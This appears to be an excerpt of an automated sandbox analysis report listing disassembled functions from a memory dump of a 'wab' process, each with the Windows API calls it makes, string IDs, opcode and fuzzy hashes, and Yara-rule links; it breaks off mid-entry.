                                                                                                                                                                                                                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                                                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4284152360-0
                                                                                                                                                                                                                    • Opcode ID: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                    • String ID: d=E
                                                                                                                                                                                                                    • API String ID: 909852535-3703654223
                                                                                                                                                                                                                    • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                    • String ID: URL
                                                                                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                                                    • String ID: F^@
                                                                                                                                                                                                                    • API String ID: 568519121-3652327722
                                                                                                                                                                                                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                                                                                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
